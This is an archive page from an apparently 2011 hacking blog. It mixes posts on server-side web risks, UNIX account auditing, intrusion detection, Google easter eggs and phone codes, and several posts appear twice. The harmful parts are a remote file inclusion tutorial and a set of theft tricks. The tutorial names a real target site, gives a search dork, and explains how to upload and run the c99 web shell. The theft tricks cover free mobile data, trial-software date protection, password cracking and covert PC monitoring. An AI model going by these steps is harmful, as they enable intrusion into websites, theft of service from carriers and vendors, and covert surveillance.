Paid To Popup Hacking Articles: February 2011

Types Of Server Sides Risks?

People require high security for internet. Most of people find it convenient to manage their bank accounts and business with the help of the internet. In such situation, the web security becomes the most important field in the network security. The interactive forms are written in HTML. Users type the information and send the request to the server to store the information by the user. 

The request launches a script on the server that processes the data supplied by the user but the result may be much unexpected which raises the need for server side security. URL Manipulation, unexpected user input, cross site scripting, buffer overflows and heap overruns are all famous known server side risks. All of these risks will be explained in this article. 


1. Conventional security

Conventionally, a firewall is placed between the web server and the internet so all the HTTP traffic reaching the web server will be secured. The firewall will allow only that traffic to the web server which fulfills all the requirements of the firewall. In this way, the web server can be saved from attacks to a great extent. 

2. URL Manipulation
In URL manipulation, some parameters of URL are changed to get different results. The user id present in the URL can be manipulated to get the access of the account of any other user. If * is placed at the place of user id, one can get the list of all the members listed in the data base. Input of any user can be accessed and manipulated present on the page which is the great threat to security and privacy. If there’s a site about Medifast and Nutrisystem coupons containing personal details of different users, then you can manipulate the URL to access personal details of other users.

3.  Unexpected User Input
When the server gets the unexpected user input, crashing of the server is the best reaction. Otherwise it will provide the control of the server to the attacker. The attacker may then use the server for whatever he wants to do. He can corrupt your database, download complete database and delete your database. If you don’t have a backup, what are you going to do?

4. Cross site scripting
In cross site scripting, attackers place malicious script on the trusted host’s end. The user may download that malicious script from the trusted host without realizing that this code is dangerous for the security. Sometimes, the server displays error page but due to malicious code, it may appear as a normal login page to the user. The user will enter the required information which can be misused as it will be sent to the attacker.

5. Buffer Overflow

The attackers may launch the attacks which results in access violation, instability and code injection. It may destruct the data stored in the database, causes the malfunctioning of software and many other destructive actions could be performed.

But what’s the solution then? You need to consider a few points to overcome the server side risks. Cryptography should be used to send the whole data in the query string. On the server side, the user input should be filtered and all the characters which are used in the scripting language should be removed.

About The Author

This article is written by Saksham, he loves loves to write on health and related topics. He writes a blog on diet and weight loss program sites that offer coupon code for Medfast and coupons for Nutrisystem meals.

How to Pretend to Hack a Website

1. Go to the page you want to hack and wait for it to be loaded fully. If you do it before, it will only edit what has already loaded.





2.
Copy this code into the url bar.

javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0


3. Hit go! If it worked right the links will have turned a more saturated blue, and when you click somewhere you'll be able to edit text

4.
Once you have made the page uneditable again, left-click in the URL Bar and press ESC. This will reset the URL to the page you are on, making it look authentic!
Happy Hacking:ppy Hacking:

Note: This does not really affect the website content at all. What you change is only visible on your computer. Then as soon as you refresh the page it will be back to normal for you too.

Hack a Website Using Remote File Inclusion

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.


Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one


To find the vulnerability the hacker will most commonly  use the following Google Dork

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com

So the hacker url will become:::


http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack



Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is


Now here is how a hacker would execute the following command to gain access


Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it
Happy Hacking.....♀

6 GOOGLE HACKS

WE ALL USE GOOGLE FOR
SEARCHING BUT ITS TIME TO
EXPLORE THE FUNNY SIDE OF
GOOGLE.
HERE I HAVE
COLLECTED THE TOP 5 FUNNY
GOOGLE TRICKS THAT WILL AMAZE YOU.
SOME OF THE
TRICKS ARE PROVIDED BY
GOOGLE ITSELF WHILE OTHER
HAVE BEEN DEVELOPERS.
SO, HERE IS THE LIST OF
GOOGLE’S TOP 5 TRICKS
1. GOOGLE GRAVITY :- WE ALL HAVE READ
THE NEWTON ’S LAW OF GRAVITY.DOES IT
ALSO
APPLY TO GOOGLE?TO TEST IT
FOLLOW THE INSTRUCTIONS
GO TO GOOGLE.COM
TYPE GOOGLE GRAVITY
CLICK ON I’M FEELING LUCKY
NOW YOU WILL SEE THE EFFECT OF
GRAVITY ON GOOGLE.THE
GOOGLE ICON WILL FALL DOWN
AUTOMATICALLY.YOU CAN EVEN
PICKUP AND THROW GOOGLE
ICON ANYWARE.
2 CHANGE BACKGROUND
IMAGE :-YOU CAN ALSO CHANGE THE
BACKGROUND
IMAGE OF GOOGLE IMAGE.TO CHANGE THE
BACKGROUND
IMAGE FOLLOW THE
INSTRUCTIONS
GO TO GOOGLE.COM
CLICK ON THE CHANGE BACKGROUND IMAGE
LOGIN WITH GMAIL USERNAME
AND UPLOAD IMAGE THIS WILL NOT WORK
IF YOU
OPEN THE ENCRYPTED
GOOGLE.
3. EPIC GOOGLE:- IN EPIC GOOGLE YOU WILL
SEE THE
FONT SIZE OF GOOGLE
INCREASING AUTOMATICALLY AS IF IT WILL
COME OUT OF YOUR COMPUTER SCREEN.TO
USE GOOGLE FOLLOW THE INSTRUCTIONS
GO TO GOOGLE.COM
TYPE EPIC GOOGLE
CLICK ON I’M FEELING LUCKY
4. GOOGLE HACKER:- WANT TO SEE HOW
THE GOOGLE
HOMEPAGE WILL LOOK IF IT
GETS HACKED .FOLLOW THE
INSTRUCTIONS BELOW
GO TO GOOGLE.COM
TYPE GOOGLE HACKER
CLICK ON I’M FEELING LUCKY .
5. ANNOYING GOOGLE: - IN THIS TRICK THE
CAPITALISATION
OF YOUR SEARCHES WILL
CHANGE AUTOMATICALLY.SOME
WORDS WILL CHANGE INTO
SMALL LETTER AND SOME INTO
CAPITAL LETTERS IN YOUR SEARCH
RESULT.WANT TO TRY IT
FOLLOW THE INSTRUCTIONS
GO TO GOOGLE.COM
TYPE ANNOYING GOOGLE
CLICK ON I’M FEELING LUCKY

6. TYPE WEENIE GOOGLE

6 GOOGLE HACKS

WE ALL USE GOOGLE FOR
SEARCHING BUT ITS TIME TO
EXPLORE THE FUNNY SIDE OF
GOOGLE.
HERE I HAVE
COLLECTED THE TOP 5 FUNNY
GOOGLE TRICKS THAT WILL AMAZE YOU.
SOME OF THE
TRICKS ARE PROVIDED BY
GOOGLE ITSELF WHILE OTHER
HAVE BEEN DEVELOPERS.
SO, HERE IS THE LIST OF
GOOGLE’S TOP 5 TRICKS
1. GOOGLE GRAVITY :- WE ALL HAVE READ
THE NEWTON ’S LAW OF GRAVITY.DOES IT
ALSO
APPLY TO GOOGLE?TO TEST IT
FOLLOW THE INSTRUCTIONS
GO TO GOOGLE.COM
TYPE GOOGLE GRAVITY
CLICK ON I’M FEELING LUCKY
NOW YOU WILL SEE THE EFFECT OF
GRAVITY ON GOOGLE.THE
GOOGLE ICON WILL FALL DOWN
AUTOMATICALLY.YOU CAN EVEN
PICKUP AND THROW GOOGLE
ICON ANYWARE.
2 CHANGE BACKGROUND
IMAGE :-YOU CAN ALSO CHANGE THE
BACKGROUND
IMAGE OF GOOGLE IMAGE.TO CHANGE THE
BACKGROUND
IMAGE FOLLOW THE
INSTRUCTIONS
GO TO GOOGLE.COM
CLICK ON THE CHANGE BACKGROUND IMAGE
LOGIN WITH GMAIL USERNAME
AND UPLOAD IMAGE THIS WILL NOT WORK
IF YOU
OPEN THE ENCRYPTED
GOOGLE.
3. EPIC GOOGLE:- IN EPIC GOOGLE YOU WILL
SEE THE
FONT SIZE OF GOOGLE
INCREASING AUTOMATICALLY AS IF IT WILL
COME OUT OF YOUR COMPUTER SCREEN.TO
USE GOOGLE FOLLOW THE INSTRUCTIONS
GO TO GOOGLE.COM
TYPE EPIC GOOGLE
CLICK ON I’M FEELING LUCKY
4. GOOGLE HACKER:- WANT TO SEE HOW
THE GOOGLE
HOMEPAGE WILL LOOK IF IT
GETS HACKED .FOLLOW THE
INSTRUCTIONS BELOW
GO TO GOOGLE.COM
TYPE GOOGLE HACKER
CLICK ON I’M FEELING LUCKY .
5. ANNOYING GOOGLE: - IN THIS TRICK THE
CAPITALISATION
OF YOUR SEARCHES WILL
CHANGE AUTOMATICALLY.SOME
WORDS WILL CHANGE INTO
SMALL LETTER AND SOME INTO
CAPITAL LETTERS IN YOUR SEARCH
RESULT.WANT TO TRY IT
FOLLOW THE INSTRUCTIONS
GO TO GOOGLE.COM
TYPE ANNOYING GOOGLE
CLICK ON I’M FEELING LUCKY

6. TYPE WEENIE GOOGLE

FREE INTERNET BROWSING IN VIDEOCON SIM FREE GPRS USING VINTERNET.COM SETTING HIGH SPEED GPRS UPTO 20KBPS IN MOBILE CAN USE IN ANY MOBILE PHONE (EX: NOKIA, SONY)

FREE INTERNET BROWSING IN VIDEOCON SIM FREE GPRS USING VINTERNET.COM SETTING
HIGH SPEED GPRS UPTO 20KBPS IN MOBILE
CAN USE IN ANY MOBILE PHONE (EX: NOKIA, SONY)
SETTINGS IN NOKIA MOBILE PHONE CONFIGURATION
GO TO CONFIGURATION OR ACCESS POINT
EDIT VIDEOCON SETTINGS LIKE BELOW GIVEN OR CREATE A NEW ONE

ACCESS POINT : VINTERNET.COM
HOMEPAGE:WWW.GOOGLE.COM

CLICK OPTION AND SELECT ADVANCE SETTINGS
CHANGE TO BELOW GIVEN
PROXY : ON PROXY ADDRESS:
10.202.5.145
PORT : 8799
APN : VGPRS.COM

NOW BROWSE FREE IN YOUR DEFAULT BROWSER
SAVE IT AND BROWSE FREE IN THE DEFAULT BROWSER

FREE INTERNET BROWSING IN VIDEOCON SIM FREE GPRS USING VINTERNET.COM SETTING HIGH SPEED GPRS UPTO 20KBPS IN MOBILE CAN USE IN ANY MOBILE PHONE (EX: NOKIA, SONY)

FREE INTERNET BROWSING IN VIDEOCON SIM FREE GPRS USING VINTERNET.COM SETTING
HIGH SPEED GPRS UPTO 20KBPS IN MOBILE
CAN USE IN ANY MOBILE PHONE (EX: NOKIA, SONY)
SETTINGS IN NOKIA MOBILE PHONE CONFIGURATION
GO TO CONFIGURATION OR ACCESS POINT
EDIT VIDEOCON SETTINGS LIKE BELOW GIVEN OR CREATE A NEW ONE

ACCESS POINT : VINTERNET.COM
HOMEPAGE:WWW.GOOGLE.COM

CLICK OPTION AND SELECT ADVANCE SETTINGS
CHANGE TO BELOW GIVEN
PROXY : ON PROXY ADDRESS:
10.202.5.145
PORT : 8799
APN : VGPRS.COM

NOW BROWSE FREE IN YOUR DEFAULT BROWSER
SAVE IT AND BROWSE FREE IN THE DEFAULT BROWSER

10 TRICKS TO USE WHEN YOUR COMPUTER HANGS OR STAK. DON'T PRESS THE POWER SWITCH USE THIS TRICKS TO RECOVER CAN ALSO RECOVER WHEN YOU ARE PLAYING GAMES

1. CLICK ON " CTRL-ALT-DELETE KEYS. THE
WINDOWS TASK
MANAGER WILL THEN OPEN,
CLICKON ALL PROGRAMS THAT
YOU DON T NEED AND END
THE TASK. YOU WILL SEE THAT
ALL PROGRAMSON YOUR TASKBAR WILL
CLOSE ONE BY
ONE. IF THIS WILL RESOLVE THE
ISSUE! THEN SAVE! NOTE: POST YOUR
COMMENTS
AFTER READ THIS ARTICLE
TIP#
1: IF YOU RE WORKING
ON AN MS OFFICE APPLICATION,
IT WILL AUTOMATICALLY SAVE
YOUR FILE IN CASE THE PROGRAMS
SUDDENLY SHUT
DOWN
TIP# 2: ALWAYS SAVE YOUR
FILE AT LEAST EVERY 2MINUTES
BY JUST SIMPLY CLICKING ON
THE"DISKETTE ICON ITS JUST ONE CLICK!)
2. IF IT DID NOT RESOLVE THE
ISSUE, ARE THERE SOME USERS
LOGGED ON THAT COMPUTER?
IF SO, GO TO SWITCH USER (FOR
XP) AND LOG OFF THAT USER,
GO BACK TO YOUR LOG ON SCREEN AND LOG
ON AGAIN.
THE REASON THE COMPUTER
HANG UP IS BECAUSE IF THERE
ARE MANY OPEN PROGRAMS
AND APPLICATIONS, THESE
RETAINS IN THE MEMORY, IF IT IS TOO
MUCH FOR THE
MEMORY TO HANDLE, IT
FREEZES! ANOTHER REASON
TOO THE COMPUTER HANG UP
IS BECAUSE IF YOU ARE
CONNECTED TO THE INTERNET VIA DIAL UP,
AND YOU ARE
RUNNING TOO MANY
APPLICATIONS AND OPENING
MANY WEBSITES. SO I
SUGGEST, IF YOU ARE
MULTIMEDIA USER OR A HEAVY INTERNET
USER, THEN YOU ARE
BETTER OFF WITH A HIGHER
MEMORY, AT LEAST 512MB OF
MEMORY. THERE ARE SIMPLE
WAYS TO AVOID COMPUTER TO
FREEZE OR HANG UP:
3. CLEAN YOUR HISTORY AT
LEAST ONCE A WEEK
>TOOLS>INTERNET
OPTIONS>CLEAR HISTORY . I
NORMALLY SET MY HISTORY TO
"0", MEANING, WHEN I RESTART MY
COMPUTER, IT
DOESN'T SAVE HISTORY PAGES
THAT I HAVE VISITED
4. DELETE ALL INTERNET
TEMPORARY FILES
>TOOLS>INTERNET
OPTIONS>DELETE FILES (DO THE
" OFFLINE" CONTENT TOO!)
5. DELETE COOKIES (SOME DO
NOT DO THIS, BUT I DO DELETE
COOKIES AT LEAST ONCE A
WEEK!) >TOOLS>INTERNET
OPTIONS>DELETE COOKIES
6. REMOVE UNNECESSARY
PROGRAMS THAT YOU NO
LONGER USE THEY ARE JUST
OCCUPYING SPACEAND
MEMORY! >CONTROL
PANEL>ADD/REMOVE PROGRAMS
7. DO DEFRAGMENTATION AT LEAST
ONCE A WEEK>POINT THE
MOUSE TO " START" BUTTON,
THEN RIGHT CLICK "
EXPLORE">RIGHT CLICK THE MOUSE
POINTING TO DRIVE C
(WHICH IS USUALLY THE MAIN
SYSTEM LOGICAL
DRIVE)>PROPERTIES>TOOLS>DEFRAGMENT
NOW
8. YOU CAN ALSO CHECK THE
LOGICAL DRIVE'S VOLUME FOR
ERRORS >POINT THE MOUSE
TO"START" BUTTON, THEN RIGHT
CLICK " EXPLORER>RIGHT CLICK
THE MOUSE POINTING TO DRIVE C (I
REPEAT, IS USUALLY
THE MAIN SYSTEMLOGICAL
DRIVE)
>PROPERTIES>TOOLS>CHECK
NOW
9. IT IS BETTER TO HAVE ONLY
ONE USER BEING LOGGED ON.
EVEN IF THERE ARE MANY
USERS, MAKE SURE THE USER
LOGS OFF AFTER USING THE
COMPUTER, RATHER THAN KEEPING IT
LOGGED ON AND
YOU DO THE SWITCHING OF
USERS. SWITCHING USERS IS
GOOD AS LONG AS YOU DON'T
KEEP ALL USERS LOGGED ON
10. ALWAYS SHUT DOWN
PROPERLY THE COMPUTER (DO
NOT USE THE POWER BUTTON
WHEN TURNING IT OFF!

10 TRICKS TO USE WHEN YOUR COMPUTER HANGS OR STAK. DON'T PRESS THE POWER SWITCH USE THIS TRICKS TO RECOVER CAN ALSO RECOVER WHEN YOU ARE PLAYING GAMES

1. CLICK ON " CTRL-ALT-DELETE KEYS. THE
WINDOWS TASK
MANAGER WILL THEN OPEN,
CLICKON ALL PROGRAMS THAT
YOU DON T NEED AND END
THE TASK. YOU WILL SEE THAT
ALL PROGRAMSON YOUR TASKBAR WILL
CLOSE ONE BY
ONE. IF THIS WILL RESOLVE THE
ISSUE! THEN SAVE! NOTE: POST YOUR
COMMENTS
AFTER READ THIS ARTICLE
TIP#
1: IF YOU RE WORKING
ON AN MS OFFICE APPLICATION,
IT WILL AUTOMATICALLY SAVE
YOUR FILE IN CASE THE PROGRAMS
SUDDENLY SHUT
DOWN
TIP# 2: ALWAYS SAVE YOUR
FILE AT LEAST EVERY 2MINUTES
BY JUST SIMPLY CLICKING ON
THE"DISKETTE ICON ITS JUST ONE CLICK!)
2. IF IT DID NOT RESOLVE THE
ISSUE, ARE THERE SOME USERS
LOGGED ON THAT COMPUTER?
IF SO, GO TO SWITCH USER (FOR
XP) AND LOG OFF THAT USER,
GO BACK TO YOUR LOG ON SCREEN AND LOG
ON AGAIN.
THE REASON THE COMPUTER
HANG UP IS BECAUSE IF THERE
ARE MANY OPEN PROGRAMS
AND APPLICATIONS, THESE
RETAINS IN THE MEMORY, IF IT IS TOO
MUCH FOR THE
MEMORY TO HANDLE, IT
FREEZES! ANOTHER REASON
TOO THE COMPUTER HANG UP
IS BECAUSE IF YOU ARE
CONNECTED TO THE INTERNET VIA DIAL UP,
AND YOU ARE
RUNNING TOO MANY
APPLICATIONS AND OPENING
MANY WEBSITES. SO I
SUGGEST, IF YOU ARE
MULTIMEDIA USER OR A HEAVY INTERNET
USER, THEN YOU ARE
BETTER OFF WITH A HIGHER
MEMORY, AT LEAST 512MB OF
MEMORY. THERE ARE SIMPLE
WAYS TO AVOID COMPUTER TO
FREEZE OR HANG UP:
3. CLEAN YOUR HISTORY AT
LEAST ONCE A WEEK
>TOOLS>INTERNET
OPTIONS>CLEAR HISTORY . I
NORMALLY SET MY HISTORY TO
"0", MEANING, WHEN I RESTART MY
COMPUTER, IT
DOESN'T SAVE HISTORY PAGES
THAT I HAVE VISITED
4. DELETE ALL INTERNET
TEMPORARY FILES
>TOOLS>INTERNET
OPTIONS>DELETE FILES (DO THE
" OFFLINE" CONTENT TOO!)
5. DELETE COOKIES (SOME DO
NOT DO THIS, BUT I DO DELETE
COOKIES AT LEAST ONCE A
WEEK!) >TOOLS>INTERNET
OPTIONS>DELETE COOKIES
6. REMOVE UNNECESSARY
PROGRAMS THAT YOU NO
LONGER USE THEY ARE JUST
OCCUPYING SPACEAND
MEMORY! >CONTROL
PANEL>ADD/REMOVE PROGRAMS
7. DO DEFRAGMENTATION AT LEAST
ONCE A WEEK>POINT THE
MOUSE TO " START" BUTTON,
THEN RIGHT CLICK "
EXPLORE">RIGHT CLICK THE MOUSE
POINTING TO DRIVE C
(WHICH IS USUALLY THE MAIN
SYSTEM LOGICAL
DRIVE)>PROPERTIES>TOOLS>DEFRAGMENT
NOW
8. YOU CAN ALSO CHECK THE
LOGICAL DRIVE'S VOLUME FOR
ERRORS >POINT THE MOUSE
TO"START" BUTTON, THEN RIGHT
CLICK " EXPLORER>RIGHT CLICK
THE MOUSE POINTING TO DRIVE C (I
REPEAT, IS USUALLY
THE MAIN SYSTEMLOGICAL
DRIVE)
>PROPERTIES>TOOLS>CHECK
NOW
9. IT IS BETTER TO HAVE ONLY
ONE USER BEING LOGGED ON.
EVEN IF THERE ARE MANY
USERS, MAKE SURE THE USER
LOGS OFF AFTER USING THE
COMPUTER, RATHER THAN KEEPING IT
LOGGED ON AND
YOU DO THE SWITCHING OF
USERS. SWITCHING USERS IS
GOOD AS LONG AS YOU DON'T
KEEP ALL USERS LOGGED ON
10. ALWAYS SHUT DOWN
PROPERLY THE COMPUTER (DO
NOT USE THE POWER BUTTON
WHEN TURNING IT OFF!

ORKUT BLINKING TRICK SCRAP JAVASCRIPT PASTE IT IN SCRAP

Want to do blinking orkut then just
Copy the following script and
paste it in your address bar
JAVASCRIPT:I=0;C=
["RED","GREEN","BLUE","YELLOW","MAGENTA","ORANGE","PINK","VIOLET"];
A=DOCUMENT.LINKS;SETINTERVAL('I+
+;A[I %
DOCUMENT.LINKS.LENGTH].STYLE.COLOR=C
[I % C.LENGTH]',10);VOID(0); ALERT
("XMEN_NET ")

ORKUT BLINKING TRICK SCRAP JAVASCRIPT PASTE IT IN SCRAP

Want to do blinking orkut then just
Copy the following script and
paste it in your address bar
JAVASCRIPT:I=0;C=
["RED","GREEN","BLUE","YELLOW","MAGENTA","ORANGE","PINK","VIOLET"];
A=DOCUMENT.LINKS;SETINTERVAL('I+
+;A[I %
DOCUMENT.LINKS.LENGTH].STYLE.COLOR=C
[I % C.LENGTH]',10);VOID(0); ALERT
("XMEN_NET ")

Auditing Weak User Accounts On UNIX System

Whenever we talk about auditing weak user accounts on UNIX or UNIX like systems the very first thought that comes to mind is using John The Ripper or L0phtCrack to audit weak passwords.
This is very big misconception among most of the people that weak user accounts only means accounts with weak passwords.
A normal user account isn't that normal if you haven't edited any of the permissions for it. So lets see how many abnormal tasks a normal user can perform if his account is not properly audited. Lets start with creation of user account.
Usually we type following command to create a normal user in UNIX or UNIX like systems.

[root@localhost~]#useradd newuser
[root@localhost~]#passwd newuser


Now what's the problem with this user creation method.

Problem number 1: This user is not member of any group.
Problem number 2: This user will have his own folder in /home directory.

If a user is in shared network environment then it is mandatory that user must be a member of some group and he/she must not have primary group of his own. By creating user by above method you have given him two powers, power to own his own group and next power of having a separate folder. Here's how you should add a user to avoid above problems.

[root@localhost~]# useradd -d /home/group_name -g group_name newuser
[root@localhost~]#passwd newuser


-d: will set default folder for user to /home/group_name
-g: will add user to group_name as primary group member

Now what might be the scope of the user we created about using and accessing disk space and memory? The answer is unlimited. That means newuser can create as many files and folders he/she wants ultimately covering up all disk-space or alternatively he/she can write or run a program that consumes lot of memory, that means if he writes and executes a program which recursively increases its stack or just able to smash its own stack then a normal user can make complete system to crash down and stand still.
And his rights to access any folder can help him hide a script or program that he/she can use to escalate privileges later to become super user without anyone noticing it.

Above problems can be solved by activating disk quota on system. According to the UNIX or Linux system you are using refer its manual to see how to activate disk quota. Once activated you can set disk quota by typing following commands,

[root@localhost~]#set quota -u newuser abc / 8000 10000 400 500

The above command will set 10000 bytes for newuser in ' / ' partition and he/she will be warned if his/her disk usage goes above 8000 bytes. At maximum he/she can create 500 files with warning on 400th file. You can replace ' / ' with directory name where you want to restrict the user.
The next problem is how to restrict user's power to use unlimited memory access? To set restrictions open “/etc/security/limits.conf” file in VI editor or any familiar editor to you. The syntax of file is quite explanatory and will differ according to the version and base kernel of your system.

Last thing that is problematic is life of account. To check it out type following command,

[root@localhost~]#chage -l newuser




Now have a look on output you'll find account expires never, password expires never, days to change password 99999. Believe it or not this is default user account setting in every UNIX and Linux system. If you are smart enough then you can easily figure out how fatal this kind of account can prove to your system if this information is not changed. To change account permissions type

[root@localhost~]change newuser


and set permissions.

There are several steps involved in auditing a UNIX or UNIX like system depending for what system is configured but auditing weak user accounts for their permissions and passwords is common task in all no matter what your motive is. I know an experienced UNIX administrator will find this article is of little help whereas new administrators will find it useful. Anyways I hope RHA readers like this post, thanks for reading, happy hacking.

About The Author

This Article is written by Nrupen Masram, Nrupen is admin of DEVIL'S BLOG ON SECURITY and this is his very first guest post on RHA. If you are are also looking forward to write a guest post on RHA, Read the guidelines here

Samsung Mobile phone secret codes


These are some samsung secert codes which i want to share with u.

IMEI : *#06#

Software version : *#1234#

FTA S/w version : *#1111#

Hardware info : *#2222#

F/W and H/W version : *#0206*8376263#

Test menu : *#0*#

battery info : *#0228#

Master Reset : *2767*3855#

GPRS info : *#4777*8665#

Bluetooth ID : *#232337#

LCD Brightness : *#8999*523#

Call List : *#2255#

External Displayl : *#8999*3825523#

Java Status Code : #*536961#

This code has something to do with phone locking. : *#7465625#


Software version : *#9999#
Same HW/SW version thing : *#8377466#
Check the locks : *#7465625#
Enables Network lock : *7465625*638*Code#
Disables Network lock : #7465625*638*Code#
Enables Subset lock : *7465625*782*Code#
Disables Subset lock : #7465625*782*Code#
Enables SP lock : *7465625*77*Code#
Disables SP lock : #7465625*77*Code#
Enables CP lock : *7465625*27*Code#
Disables CP lock : #7465625*27*Code#
Enables SIM lock : *7465625*746*Code#
Disables SIM lock : #7465625*746*Code#
Activa lock ON : *7465625*228#
Activa lock OFF : #7465625*228#
Auto Network lock ON : *7465625*28638#
Auto Network lock OFF : #7465625*28638#
Auto subset lock ON : *7465625*28782#
Auto subset lock OFF : #7465625*28782#
*#06# -> Show IMEI
*#9999# -> Show Software Version
*#0837# -> Show Software Version (instructions)
*#0001# -> Show Serial Parameters
*#9125# -> Activates the smiley when charging.
*#9998*228# -> Battery status (capacity, voltage, temperature)
*#9998*246# -> Program status
*#9998*289# -> Change Alarm Buzzer Frequency
*#9998*324# -> Debug screens
*#9998*364# -> Watchdog
*#9998*377# -> EEPROM Error Stack - Use side keys to select values. Cancel and ok.
*#9998*427# -> Trace Watchdog
*#9998*523# -> Change LCD

OLD TRICK FOR FREE INTERNET THROUGH T9SPACE

FREE INTERNET BROWSING
1. ACTIVATE MOBILE OFFICE
SENT MO TO 543210
AND SAVE THE SETTINGS AS YOUR DEFAULT SETTINGS THEN EDIT IT

IF YOU HAVE MOBILE OFFICE SETTINGS ALREADY THEN EDIT IT

2. EDITING DEFAULT
CHANGE YOUR HOMEPAGE TO THE BELOW GIVEN SETTINGS

http://203.199.114.181.t9space.com

DONE SAVE IT
AND ACCESS FREE INTERNET GPRS ON AIRTEL

OLD TRICK FOR FREE INTERNET THROUGH T9SPACE

FREE INTERNET BROWSING
1. ACTIVATE MOBILE OFFICE
SENT MO TO 543210
AND SAVE THE SETTINGS AS YOUR DEFAULT SETTINGS THEN EDIT IT

IF YOU HAVE MOBILE OFFICE SETTINGS ALREADY THEN EDIT IT

2. EDITING DEFAULT
CHANGE YOUR HOMEPAGE TO THE BELOW GIVEN SETTINGS

http://203.199.114.181.t9space.com

DONE SAVE IT
AND ACCESS FREE INTERNET GPRS ON AIRTEL

Intrusion detection systems

Well,Its been long time to post any blog.I was little bit busy with some projects.So guys In this post I will share you some knowldge about Intrusion detection system(IDS).





An intrusion detection system (IDS) is software and/or hardware based system that monitors network traffic and monitors for suspicious activity and alerts the system or network administrator in case it detects some intrusion attempt from an external source into a private network. In some cases the IDS may also respond to anomalous or malicious traffic by taking action such as blocking the user or source IP address from accessing the network!
An intrusion detection system is used to detect several types of malicious behaviors that can compromise the security and trust of a computer system. This includes network attacks against vulnerable services, data driven attacks on applications, host based attacks such as privilege escalation, unauthorized logins and access to sensitive files, and malware.

IDS can be broadly classified into 3

[1]HIDS
[2]NIDS
[3]PIDS


Host-based intrusion detection systems or HIDS are installed as agents on a host. These intrusion detection systems can look into system and application log files to detect any intruder activity. thus for that matter HIDS is comparitively slow in function as compared to the NIDS
NIDS detect attacks by capturing and analyzing network packets. Listening on a network segment or switch, a NIDS can monitor the network traffic affecting multiple hosts that are connected to the network segment, thereby protecting those hosts. Network-based IDSs often consist of a set of single-purpose sensors or hosts placed at various points in a network. These units monitor network traffic, performing local analysis of that traffic and reporting attacks to a central management console. An eg of NIDS is Snort as explained below

PIDS consists of a system or agent that would typically sit at the front end of a server, monitoring and analyzing the communication protocol between a connected device (a user/PC or system).For Eg : For a web server this would typically monitor the HTTPS protocol stream and understand the HTTP protocol relative to the web server/system it is trying to protect
Snort is a free and open source NIDS that has a large set of pre-configured rules. Snort also allows you to write your own rule set. Snort performs protocol analysis, content searching/matching, and is commonly used to actively block or passively detect a variety of attacks and probes, such as buffer overflows, stealth port scans, web application attacks, SMB probes, and OS fingerprinting attempts etc

Speaking of IDS should be incomplete if i skip telling you about a feature called “HoneyPot” & “Victim hosts”
Honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems. Generally it consists of a computer, data, or a network site that appears to be part of a network but which is actually isolated, (un)protected, and monitored, and which seems to contain information or a resource that would be of value to attackers.
Victim hosts are an active network counter-intrusion tool. These computers run special software, designed to appear to an intruder as being important and worth looking into. In reality, these programs are dummies, and their patterns are constructed specifically to foster interest in attackers. The software installed on, and run by, victim hosts is dual purpose. First, these dummy programs keep a network intruder occupied looking for valuable information where none exists, effectively convincing him or her to isolate themselves in what is truly an unimportant part of the network. This decoy strategy is designed to keep an intruder from getting bored and heading into truly security-critical systems. The second part of the victim host strategy is intelligence gathering. Once an intruder has broken into the victim host, the machine or a network administrator can examine the intrusion methods used by the intruder. This intelligence can be used to build specific countermeasures to intrusion techniques, making truly important systems on the network less vulnerable to intrusion.

Free Hacking Tools

f you´re interested in hacking, you´ll need a good set of base tools with which to work. Hopefully, there are many free hacking tools online which can help you . Below you can find llist of hacking tools.  

1. Date Cracker 2000
Data Cracker 2000 is an application which can easily remove the date protection(i.e. trail protection) from many software. It is very useful for shareware or trial versions of software which expire after a specific date. When you crack the software with Date Cracker 2000, the software will always show something like “There are 90 days remaining in your trial period” and the software will actually last forever. Some programs have good protection and it isn’t possible to remove their date protection .


Date Cracker 2000download
Websitehttp://www.e-tech.ca/003-dc2000.asp
Download Pagehttp://www.wonderworks.ca/nbia/dc20000.zip
File size1.5 MB
Video Tutorialhttp://www.wonderworks.ca/nbia/dc2000.wmv
2. Advanced Port Scanner
This is small size, very fast and simple for use port scanner . Just type IP Addresses of the computer , that you want to scan and you´ll get detailed descriptions for common ports.
hack
Advanced Port Scannerdownload
Websitehttp://www.radmin.com/products/utilities/portscanner.php
Download Pagehttp://www.download.com/Advanced-Port-Scanner
File size426 KB
Operating SystemWindows 95/98/ME/NT4.0/2000/XP/2003/Vista/2008
License:Free


3. Ophcrack
Ophcrack is great tool which can easy crack or recover lost Windows password . It works using rainbow tables and brute force combined. For more information about this software visit my older post ” How to crack windows XP password “.
Ophcrackdownload
Websitehttp://ophcrack.sourceforge.net/
Download Pagehttp://ophcrack.sourceforge.net/download.php?type=ophcrack
File size4.90 MB
Video TutorialVideo


4. RAR Password Cracker
This is very effective program, which can easily to crack RAR/WinRAR password, it use a dictionary and a brute force attack.For more informatio about cracking here is detailed tutorial step by step How To Crack The Password Of The RAR File


RAR Password Crackerdownload
Websitehttp://www.rarpasswordcracker.com/
Download Pagehttp://www.rarpasswordcracker.com/rpc412_setup.exe
File size205 Kb
LicenseFreeware


5. PC Activity Monitor

PC Activity Monitor is an ultimate invisible and undetectable easy-to-use monitoring and surveillance tool for both networked and personal PCs. It is professional software that captures all users activity on the PC. All data collected by the monitoring are saved to encrypted log file. The log file can be optionally sent via e-mail to a specified address (or saved to a specified shared resource in LAN environment) for further inspection and analysis.
hack
PC Activity Monitordownload
